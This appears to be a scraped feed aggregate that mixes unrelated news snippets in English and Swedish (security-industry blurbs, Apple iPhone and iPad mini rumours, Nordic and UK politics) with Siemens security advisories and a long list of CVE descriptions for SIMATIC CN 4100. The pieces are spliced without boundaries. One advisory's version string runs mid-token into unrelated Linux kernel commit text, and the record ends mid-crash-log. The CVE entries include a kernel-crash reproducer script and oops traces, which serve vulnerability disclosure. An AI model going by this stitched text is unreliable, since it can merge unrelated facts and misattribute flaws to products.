Independent benchmarking finds Mythos highly effective for source code audits, reverse engineering, and native-code analysis, though its exploit validation and reasoning capabilities remain inconsistent. The post Mythos Proves Potent in Vulnerability Discovery, Less Convincing Elsewhere appeared first on SecurityWeek.

The acquisition enables Akamai to expand its Zero Trust portfolio to add protection directly into the browser. The post Akamai to Acquire AI and Browser Security Firm LayerX for $205 Million appeared first on SecurityWeek.

Drottning Margrethe II har lagts in på sjukhus i Danmark på grund av kärlkramp, skriver det danska kungahuset.

I Danmark har Drottning Margrethe har lagts in på sjukhus där hon vårdas för kärlkrampDet skriver det danska kungahuset i ett pressmeddelande.”Det är klart att det väcker en viss oro”, säger Sveriges Radios Nordenkorrespondent David Rasmusson.

AI and the bit barns that power it have developed a serious PR problem

Handshakes, taps on the arm, and frequent asides marked the much-awaited meeting between Xi Jinping and Donald Trump on Thursday morning, as the two presidents projected a close rapport during the first full day of Trump’s visit to China. Attention was focused not only on the substance of the high-stakes talks, but also on the personal dynamics between the US and Chinese heads of state – a relationship widely seen as a barometer of the broader diplomatic mood as the world’s two largest economies...

Apple is already planning a second version of the "four-edge bending" display that is rumored to debut on next year's 20th-anniversary iPhone, claims a new report out of Korea. For the 20th-anniversary iPhone, Apple is said to be introducing a display that curves down around all four edges of the device for a borderless visual experience. It could be one of the biggest design shifts in the iPhone's history since the 10th anniversary iPhone X, which saw Apple drop the Home button, introduce a notched display, and adopt an intuitive swipe gesture-based navigation interface. Today, ETNews reports that Apple is planning a two-stage rollout for the new OLED display technology that the commemorative iPhone will use, with a more advanced version said to be coming a year later. For the 2027 variant, Apple will reportedly rely on OLED technology that uses a magnesium-silver (MgAg) alloy in the cathode layer. This implementation can cause image distortion and brightness loss in the curved areas, but Apple is apparently willing to live with the compromise for the 20th-anniversary iPhone while more advanced technology scales. Apple then plans to address the issue in 2028 by transitioning to next-generation transparent electrodes. Apple will reportedly switch to indium zinc oxide (IZO) cathode materials, and because IZO is more transparent, it should reduce distortion, uneven brightness, and heat issues around the curved edges while enabling even narrower bezels. ETNews reports that Samsung Display and LG Display have already been put on alert to prepare for the two-stage rollout. LG recently announced a ₩1.106 trillion investment (roughly $790 million) in OLED infrastructure, which industry observers believe is connected to development and mass production of the new technology. Meanwhile, Samsung is reportedly evaluating whether its existing OLED lines can accommodate the required hardware, but a dedicated production line is not out of the question, and may well be necessary. Bloomberg in May 2025 reported on Apple's plans to launch a "mostly glass, curved iPhone without any cutouts in the display" for its 20th-anniversary model. The Information last year also cited multiple sources claiming that at least one new iPhone model launching in 2027 will have a truly edge-to-edge display. Tags: 20th-Anniversary iPhone, ETNewsThis article, "20th Anniversary iPhone's Curved Display to Improve a Year Later" first appeared on MacRumors.comDiscuss this article in our forums

I have been writing about the Cache Aware Scheduling work led by Intel engineers on the Linux kernel for more than a year. I've also tested out Cache Aware Scheduling on both Intel and AMD CPUs with the patched Linux kernel to great success. And thus very happy to see the Cache Aware Scheduling patches inching closer to the mainline Linux kernel...

En bäver har väckt stor uppmärksamhet ute i skärgården efter att flera öbor fått syn på djuret. Under en promenad på Vrångö tillsammans med sin man och hund fick Pia Ternstrand syn på den ovanliga gästen.

Initial access broker KongTuke has moved to Microsoft Teams for social engineering attacks, taking as little as five minutes to gain persistent access to corporate networks. [...]

Strengthening Indonesia’s digital ecosystem through AI, cloud computing, and next-gen connectivity

Salt Typhoon has hit an energy entity in Azerbaijan. Twill Typhoon has targeted Asian entities with an updated RAT. The post Chinese APTs Expand Targets, Update Backdoors in Recent Campaigns appeared first on SecurityWeek.

According to the latest rumors, Apple is close to launching its next-generation iPad mini. So what should we expect from the successor to the iPad mini 7 that Apple released over a year ago? Read on to find out. Processor and Performance Apple is working on a next-generation version of the iPad mini (codename J510/J511) that features the A19 Pro chip, according to information found in code that Apple mistakenly shared in August. Apple's A19 Pro chip since debuted in the iPhone Air and iPhone 17 Pro models. The iPhone 17 Pro models include the higher-end version of Apple's A19 Pro chip with a 6-core CPU and a 6-core GPU, while the iPhone Air uses a mid-tier A19 Pro chip with one fewer GPU core than the A19 Pro chip used in the iPhone 17 Pro and Pro Max. If the code leak is accurate for the iPad mini 8, Apple is likely to use the mid-tier A19 Pro chip found in the iPhone Air. This is based on the fact that the A17 Pro chip used in the iPad mini 7 has a 6-core CPU with two high-performance cores and four efficiency cores, along with a 5-core GPU, compared to the 6-core GPU found on the A17 Pro used in the iPhone 15 Pro. Apple built the A19 Pro chip on an upgraded third-generation 3-nanometer N3P process for modest speed and efficiency improvements. The chip includes a 16-core Neural Engine, next-generation dynamic caching, and unified image compression. The GPU in the A19 Pro has an upgraded architecture with a larger cache, more memory, and Neural Accelerators that are built into each core. Apple says that this change provides 3× the peak GPU compute over the prior-generation chip. There's also an upgraded 16-core Neural Engine for AI tasks. There is an outside chance that Apple opts for the A20 Pro chip for the new iPad mini. The claim has been made by a MacRumors tipster who analyzed a macOS kernel debug kit containing internal Apple codenames. However, the iPad mini has not always received Apple's newest A-series chip at the time it was updated, so the A19 Pro cannot be ruled out at this time. iPhone 18 Pro models are also expected to use the A20 Pro chip, which will reportedly be fabricated with TSMC's advanced 2nm process. Display Apple's plan to transition the ‌‌iPad mini‌‌ from an LCD to an OLED display is widely rumored. According to Bloomberg's Mark Gurman, the small form-factor tablet is likely to be the next Apple device to adopt OLED. According to a Chinese leaker with sources in Apple's supply chain, Apple has evaluated a Samsung-made OLED display for its next iPad mini model. It remains unclear whether the iPad mini 8 will feature a higher refresh rate than the 60Hz LCD display used in the existing iPad mini 7, but since the new base iPhone 17 now uses a 120Hz ProMotion panel, it would be reasonable to expect the same on the first OLED iPad mini. A separate report has suggested the ‌‌‌iPad mini 8‌‌‌'s screen could increase in size from 8.3 inches to 8.7 inches with the adoption of OLED. OLED panels can individually control each pixel, resulting in more precise color reproduction and deeper blacks compared to other common display technologies. They also provide superior contrast, faster response times, better viewing angles, and greater design flexibility. All of Apple's flagship iPhones use OLED panels, and in May 2024 the company brought the display technology to the iPad Pro for the first time. Unlike Apple's ‌iPad Pro‌ models, which feature two-stack low-temperature polycrystalline oxide (LTPO) OLED panels‌, the ‌iPad mini‌ may have a single-stack low-temperature polycrystalline silicon (LTPS) panel, which would make it dimmer. Chassis Design Apple is reportedly working to give the iPad mini 8 a more water-resistant design, according to Bloomberg's Mark Gurman. The updated casing would bring protection levels closer to those of the iPhone, making the tablet safer for use in damp environments. To achieve this, Apple is said to have designed a new vibration-based speaker system that eliminates the need for traditional speaker holes. By using sound-emitting surfaces instead of open grilles, the company can reduce potential entry points for water and dust, resulting in a more sealed, durable enclosure. On the iPhone, Apple relies on adhesives and gaskets to shield speakers and other openings from moisture. The iPad mini's approach appears to go further, doing away with the holes altogether. Current iPad mini models lack any official IP rating, but the upcoming version could mark the first in the lineup to feature a certified level of water protection. Apple patents could offer further clues to the new design direction. For example, a 2014 patent outlines a "mechanically actuated panel acoustic system" that vibrates flat surfaces to generate sound, effectively turning parts of a device's chassis into a speaker diaphragm. This could potentially allow Apple to produce audio without visible speaker holes. The patent suggest Apple has been building towards a sealed, vibration-based acoustic system for several years. Release Date According to research firm Omdia, the ‌‌iPad mini‌‌ is expected to adopt an OLED display in 2027. However, Korea's ET News and ZDNET Korea have both suggested that the iPad mini will be updated with an OLED display in 2026. Bloomberg has also said the update could come as soon as this year. The most recent word on the subject comes from Weibo-based leaker Instant Digital, who claims the OLED iPad mini will be launched in the second half of 2026 at the earliest. In May 2024, it was reported that Samsung Display had started developing sample OLED panels for a future ‌iPad mini‌, with plans to initiate mass production at its facility in Cheonan in the second half of 2025. The same report claimed that Apple will bring an OLED panel to the iPad Air alongside the ‌iPad mini‌ in 2026, though Apple only refreshed the iPad Air in March, and more recent reporting suggests an OLED iPad Air will arrive in early 2027. The latter outlook aligns with a December report by analyst firm Display Supply Chain Consultants (DSCC) that said an 8.5-inch OLED iPad mini is planned for a 2026 launch, while 11-inch and 13-inch OLED iPad Air models are expected to follow in 2027. Ultimately, there are no rumors suggesting exactly when the next ‌iPad mini‌ will be released, but a launch later in 2026 has a high probability. Pricing Apple's ‌iPad mini‌ with OLED display technology and improved water resistance is expected to be more expensive, and Apple could charge up to $100 more for the device, according to Bloomberg's Gurman. The ‌iPad mini‌ is currently priced starting at $499. Gurman has previously argued that Apple should consider a lower-end version of the mini, or at least a change to its current $499 starting price, given that it's up against rival products that cost a lot less. However, Apple users who are looking for a more affordable option should probably consider the 10th-generation iPad instead. Starting at $329, the iPad offers many iPad mini features, such as Touch ID and Center Stage, but at a lower price that balances functionality and affordability. Related Roundup: iPad miniTag: OLEDBuyer's Guide: iPad Mini (Don't Buy)Related Forum: iPadThis article, "OLED iPad Mini: Release Date, Pricing, and What to Expect" first appeared on MacRumors.comDiscuss this article in our forums

Storbritanniens hälsominister Wes Streeting lämnar sin post, skriver han i ett öppet brev där han uppger att han förlorat förtroendet för premiärminister Keir Starmer. Samtidigt uppges Greater Manchester-borgmästaren Andy Burnham vilja återvända till parlamentet.

View CSAF Summary ROS# contains a ROS service file_server, that before version 2.2.2 contains a path traversal vulnerability which could allow an attacker to access, i.e. read and write, arbitrary files, which are accessible with the user rights of the user that runs the service, on the system that hosts service. Siemens has released a new version for ROS# and recommends to update to the latest version. The following versions of Siemens Siemens ROS# are affected: ROS# vers:intdot/

View CSAF Summary Siemens gPROMS Web Applications Publisher (gWAP) is affected by a remote code execution vulnerability introduced through a third-party component, namely the Axios HTTP client library. The vulnerability stems from a specific "Gadget" attack chain that allows prototype pollution in other third-party libraries, potentially allowing an attacker to execute arbitrary code. Siemens has released a new version for gWAP and recommends to update to the latest version. The following versions of Siemens gWAP are affected: gWAP vers:intdot/

View CSAF Summary SIMATIC CN 4100 contains multiple vulnerabilities which could potentially lead to a compromise in availability, integrity and confidentiality. Siemens has released a new version for SIMATIC CN 4100 and recommends to update to the latest version. The following versions of Siemens SIMATIC are affected: SIMATIC CN 4100 vers:intdot/hpo_dp_link_enc before using it [WHAT & HOW] Functions dp_enable_link_phy and dp_disable_link_phy can pass link_res without initializing hpo_dp_link_enc and it is necessary to check for null before dereferencing. This fixes 2 FORWARD_NULL issues reported by Coverity. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2024-57924 In the Linux kernel, the following vulnerability has been resolved: fs: relax assertions on failure to encode file handles Encoding file handles is usually performed by a filesystem >encode_fh() method that may fail for various reasons. The legacy users of exportfs_encode_fh(), namely, nfsd and name_to_handle_at(2) syscall are ready to cope with the possibility of failure to encode a file handle. There are a few other users of exportfs_encode_{fh,fid}() that currently have a WARN_ON() assertion when ->encode_fh() fails. Relax those assertions because they are wrong. The second linked bug report states commit 16aac5ad1fa9 ("ovl: support encoding non-decodable file handles") in v6.6 as the regressing commit, but this is not accurate. The aforementioned commit only increases the chances of the assertion and allows triggering the assertion with the reproducer using overlayfs, inotify and drop_caches. Triggering this assertion was always possible with other filesystems and other reasons of ->encode_fh() failures and more particularly, it was also possible with the exact same reproducer using overlayfs that is mounted with options index=on,nfs_export=on also on kernels < v6.6. Therefore, I am not listing the aforementioned commit as a Fixes commit. Backport hint: this patch will have a trivial conflict applying to v6.6.y, and other trivial conflicts applying to stable kernels < v6.6. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-617 Reachable Assertion Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2024-58240 In the Linux kernel, the following vulnerability has been resolved: tls: separate no-async decryption request handling from async If we're not doing async, the handling is much simpler. There's no reference counting, we just need to wait for the completion to wake us up and return its result. We should preferably also use a separate crypto_wait. I'm not seeing a UAF as I did in the past, I think aec7961916f3 ("tls: fix race between async notify and socket close") took care of it. This will make the next fix easier. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-416 Use After Free Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.3 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L CVE-2025-6021 A flaw was found in libxml2's xmlBuildQName function, where integer overflows in buffer size calculations can lead to a stack-based buffer overflow. This issue can result in memory corruption or a denial of service when processing crafted input. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2025-6052 A flaw was found in how GLib’s GString manages memory when adding data to strings. If a string is already very large, combining it with more input can cause a hidden overflow in the size calculation. This makes the system think it has enough memory when it doesn’t. As a result, data may be written past the end of the allocated memory, leading to crashes or memory corruption. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-190 Integer Overflow or Wraparound Metrics CVSS Version Base Score Base Severity Vector String 3.1 3.7 LOW CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L CVE-2025-7425 A flaw was found in libxslt where the attribute type, atype, flags are modified in a way that corrupts internal memory management. When XSLT functions, such as the key() process, result in tree fragments, this corruption prevents the proper cleanup of ID attributes. As a result, the system may access freed memory, causing crashes or enabling attackers to trigger heap corruption. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-416 Use After Free Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:H CVE-2025-8916 Allocation of Resources Without Limits or Throttling vulnerability in Legion of the Bouncy Castle Inc. BC Java bcpkix on All (API modules), Legion of the Bouncy Castle Inc. BC Java bcprov on All (API modules), Legion of the Bouncy Castle Inc. BCPKIX FIPS bcpkix-fips on All (API modules) allows Excessive Allocation. This vulnerability is associated with program files https://github.Com/bcgit/bc-java/blob/main/pkix/src/main/java/org/bouncycastle/pkix/jcajce/PKIXCertPathReviewer.Java, https://github.Com/bcgit/bc-java/blob/main/prov/src/main/java/org/bouncycastle/x509/PKIXCertPathReviewer.Java. This issue affects BC Java: from 1.44 through 1.78; BC Java: from 1.44 through 1.78; BCPKIX FIPS: from 1.0.0 through 1.0.7, from 2.0.0 through 2.0.7. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-770 Allocation of Resources Without Limits or Throttling Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L CVE-2025-9230 Issue summary: An application trying to decrypt CMS messages encrypted using password based encryption can trigger an out-of-bounds read and write. Impact summary: This out-of-bounds read may trigger a crash which leads to Denial of Service for an application. The out-of-bounds write can cause a memory corruption which can have various consequences including a Denial of Service or Execution of attacker-supplied code. Although the consequences of a successful exploit of this vulnerability could be severe, the probability that the attacker would be able to perform it is low. Besides, password based (PWRI) encryption support in CMS messages is very rarely used. For that reason the issue was assessed as Moderate severity according to our Security Policy. The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this issue, as the CMS implementation is outside the OpenSSL FIPS module boundary. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-125 Out-of-bounds Read Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2025-9231 Issue summary: A timing side-channel which could potentially allow remote recovery of the private key exists in the SM2 algorithm implementation on 64 bit ARM platforms. Impact summary: A timing side-channel in SM2 signature computations on 64 bit ARM platforms could allow recovering the private key by an attacker.. While remote key recovery over a network was not attempted by the reporter, timing measurements revealed a timing signal which may allow such an attack. OpenSSL does not directly support certificates with SM2 keys in TLS, and so this CVE is not relevant in most TLS contexts. However, given that it is possible to add support for such certificates via a custom provider, coupled with the fact that in such a custom provider context the private key may be recoverable via remote timing measurements, we consider this to be a Moderate severity issue. The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this issue, as SM2 is not an approved algorithm. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-385 Covert Timing Channel Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L CVE-2025-9232 Issue summary: An application using the OpenSSL HTTP client API functions may trigger an out-of-bounds read if the 'no_proxy' environment variable is set and the host portion of the authority component of the HTTP URL is an IPv6 address. Impact summary: An out-of-bounds read can trigger a crash which leads to Denial of Service for an application. The OpenSSL HTTP client API functions can be used directly by applications but they are also used by the OCSP client functions and CMP (Certificate Management Protocol) client implementation in OpenSSL. However the URLs used by these implementations are unlikely to be controlled by an attacker. In this vulnerable code the out of bounds read can only trigger a crash. Furthermore the vulnerability requires an attacker-controlled URL to be passed from an application to the OpenSSL function and the user has to have a 'no_proxy' environment variable set. For the aforementioned reasons the issue was assessed as Low severity. The vulnerable code was introduced in the following patch releases: 3.0.16, 3.1.8, 3.2.4, 3.3.3, 3.4.0 and 3.5.0. The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this issue, as the HTTP client implementation is outside the OpenSSL FIPS module boundary. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-125 Out-of-bounds Read Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2025-9820 A flaw was found in the GnuTLS library, specifically in the gnutls_pkcs11_token_init() function that handles PKCS#11 token initialization. When a token label longer than expected is processed, the function writes past the end of a fixed-size stack buffer. This programming error can cause the application using GnuTLS to crash or, in certain conditions, be exploited for code execution. As a result, systems or applications relying on GnuTLS may be vulnerable to a denial of service or local privilege escalation attacks. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-121 Stack-based Buffer Overflow Metrics CVSS Version Base Score Base Severity Vector String 3.1 4 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L CVE-2025-14831 A flaw was found in GnuTLS. This vulnerability allows a denial of service (DoS) by excessive CPU (Central Processing Unit) and memory consumption via specially crafted malicious certificates containing a large number of name constraints and subject alternative names (SANs). View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-407 Inefficient Algorithmic Complexity Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L CVE-2025-23143 In the Linux kernel, the following vulnerability has been resolved: net: Fix null-ptr-deref by sock_lock_init_class_and_name() and rmmod. When I ran the repro [0] and waited a few seconds, I observed two LOCKDEP splats: a warning immediately followed by a null-ptr-deref. [1] Reproduction Steps: 1) Mount CIFS 2) Add an iptables rule to drop incoming FIN packets for CIFS 3) Unmount CIFS 4) Unload the CIFS module 5) Remove the iptables rule At step 3), the CIFS module calls sock_release() for the underlying TCP socket, and it returns quickly. However, the socket remains in FIN_WAIT_1 because incoming FIN packets are dropped. At this point, the module's refcnt is 0 while the socket is still alive, so the following rmmod command succeeds. # ss -tan State Recv-Q Send-Q Local Address:Port Peer Address:Port FIN-WAIT-1 0 477 10.0.2.15:51062 10.0.0.137:445 # lsmod | grep cifs cifs 1159168 0 This highlights a discrepancy between the lifetime of the CIFS module and the underlying TCP socket. Even after CIFS calls sock_release() and it returns, the TCP socket does not die immediately in order to close the connection gracefully. While this is generally fine, it causes an issue with LOCKDEP because CIFS assigns a different lock class to the TCP socket's sk->sk_lock using sock_lock_init_class_and_name(). Once an incoming packet is processed for the socket or a timer fires, sk->sk_lock is acquired. Then, LOCKDEP checks the lock context in check_wait_context(), where hlock_class() is called to retrieve the lock class. However, since the module has already been unloaded, hlock_class() logs a warning and returns NULL, triggering the null-ptr-deref. If LOCKDEP is enabled, we must ensure that a module calling sock_lock_init_class_and_name() (CIFS, NFS, etc) cannot be unloaded while such a socket is still alive to prevent this issue. Let's hold the module reference in sock_lock_init_class_and_name() and release it when the socket is freed in sk_prot_free(). Note that sock_lock_init() clears sk->sk_owner for svc_create_socket() that calls sock_lock_init_class_and_name() for a listening socket, which clones a socket by sk_clone_lock() without GFP_ZERO. [0]: CIFS_SERVER="10.0.0.137" CIFS_PATH="//${CIFS_SERVER}/Users/Administrator/Desktop/CIFS_TEST" DEV="enp0s3" CRED="/root/WindowsCredential.txt" MNT=$(mktemp -d /tmp/XXXXXX) mount -t cifs ${CIFS_PATH} ${MNT} -o vers=3.0,credentials=${CRED},cache=none,echo_interval=1 iptables -A INPUT -s ${CIFS_SERVER} -j DROP for i in $(seq 10); do umount ${MNT} rmmod cifs sleep 1 done rm -r ${MNT} iptables -D INPUT -s ${CIFS_SERVER} -j DROP [1]: DEBUG_LOCKS_WARN_ON(1) WARNING: CPU: 10 PID: 0 at kernel/locking/lockdep.c:234 hlock_class (kernel/locking/lockdep.c:234 kernel/locking/lockdep.c:223) Modules linked in: cifs_arc4 nls_ucs2_utils cifs_md4 [last unloaded: cifs] CPU: 10 UID: 0 PID: 0 Comm: swapper/10 Not tainted 6.14.0 #36 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 RIP: 0010:hlock_class (kernel/locking/lockdep.c:234 kernel/locking/lockdep.c:223) ... Call Trace: __lock_acquire (kernel/locking/lockdep.c:4853 kernel/locking/lockdep.c:5178) lock_acquire (kernel/locking/lockdep.c:469 kernel/locking/lockdep.c:5853 kernel/locking/lockdep.c:5816) _raw_spin_lock_nested (kernel/locking/spinlock.c:379) tcp_v4_rcv (./include/linux/skbuff.h:1678 ./include/net/tcp.h:2547 net/ipv4/tcp_ipv4.c:2350) ... BUG: kernel NULL pointer dereference, address: 00000000000000c4 PF: supervisor read access in kernel mode PF: error_code(0x0000) - not-present page PGD 0 Oops: Oops: 0000 [#1] PREEMPT SMP NOPTI CPU: 10 UID: 0 PID: 0 Comm: swapper/10 Tainted: G W 6.14.0 #36 Tainted: [W]=WARN Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 RIP: 0010:__lock_acquire (kernel/ ---truncated--- View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-23160 In the Linux kernel, the following vulnerability has been resolved: media: mediatek: vcodec: Fix a resource leak related to the scp device in FW initialization On Mediatek devices with a system companion processor (SCP) the mtk_scp structure has to be removed explicitly to avoid a resource leak. Free the structure in case the allocation of the firmware structure fails during the firmware initialization. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-401 Missing Release of Memory after Effective Lifetime Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-31257 This issue was addressed with improved memory handling. This issue is fixed in Safari 18.5, iOS 18.5 and iPadOS 18.5, macOS Sequoia 15.5, tvOS 18.5, visionOS 2.5, watchOS 11.5. Processing maliciously crafted web content may lead to an unexpected Safari crash. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer Metrics CVSS Version Base Score Base Severity Vector String 3.1 4.7 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:L CVE-2025-37931 In the Linux kernel, the following vulnerability has been resolved: btrfs: adjust subpage bit start based on sectorsize When running machines with 64k page size and a 16k nodesize we started seeing tree log corruption in production. This turned out to be because we were not writing out dirty blocks sometimes, so this in fact affects all metadata writes. When writing out a subpage EB we scan the subpage bitmap for a dirty range. If the range isn't dirty we do bit_start++; to move onto the next bit. The problem is the bitmap is based on the number of sectors that an EB has. So in this case, we have a 64k pagesize, 16k nodesize, but a 4k sectorsize. This means our bitmap is 4 bits for every node. With a 64k page size we end up with 4 nodes per page. To make this easier this is how everything looks [0 16k 32k 48k ] logical address [0 4 8 12 ] radix tree offset [ 64k page ] folio [ 16k eb ][ 16k eb ][ 16k eb ][ 16k eb ] extent buffers [ | | | | | | | | | | | | | | | | ] bitmap Now we use all of our addressing based on fs_info->sectorsize_bits, so as you can see the above our 16k eb->start turns into radix entry 4. When we find a dirty range for our eb, we correctly do bit_start += sectors_per_node, because if we start at bit 0, the next bit for the next eb is 4, to correspond to eb->start 16k. However if our range is clean, we will do bit_start++, which will now put us offset from our radix tree entries. In our case, assume that the first time we check the bitmap the block is not dirty, we increment bit_start so now it == 1, and then we loop around and check again. This time it is dirty, and we go to find that start using the following equation start = folio_start + bit_start * fs_info->sectorsize; so in the case above, eb->start 0 is now dirty, and we calculate start as 0 + 1 * fs_info->sectorsize = 4096 4096 >> 12 = 1 Now we're looking up the radix tree for 1, and we won't find an eb. What's worse is now we're using bit_start == 1, so we do bit_start += sectors_per_node, which is now 5. If that eb is dirty we will run into the same thing, we will look at an offset that is not populated in the radix tree, and now we're skipping the writeout of dirty extent buffers. The best fix for this is to not use sectorsize_bits to address nodes, but that's a larger change. Since this is a fs corruption problem fix it simply by always using sectors_per_node to increment the start bit. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-37968 In the Linux kernel, the following vulnerability has been resolved: iio: light: opt3001: fix deadlock due to concurrent flag access The threaded IRQ function in this driver is reading the flag twice: once to lock a mutex and once to unlock it. Even though the code setting the flag is designed to prevent it, there are subtle cases where the flag could be true at the mutex_lock stage and false at the mutex_unlock stage. This results in the mutex not being unlocked, resulting in a deadlock. Fix it by making the opt3001_irq() code generally more robust, reading the flag into a variable and using the variable value at both stages. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-667 Improper Locking Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38322 In the Linux kernel, the following vulnerability has been resolved: perf/x86/intel: Fix crash in icl_update_topdown_event() The perf_fuzzer found a hard-lockup crash on a RaptorLake machine: Oops: general protection fault, maybe for address 0xffff89aeceab400: 0000 CPU: 23 UID: 0 PID: 0 Comm: swapper/23 Tainted: [W]=WARN Hardware name: Dell Inc. Precision 9660/0VJ762 RIP: 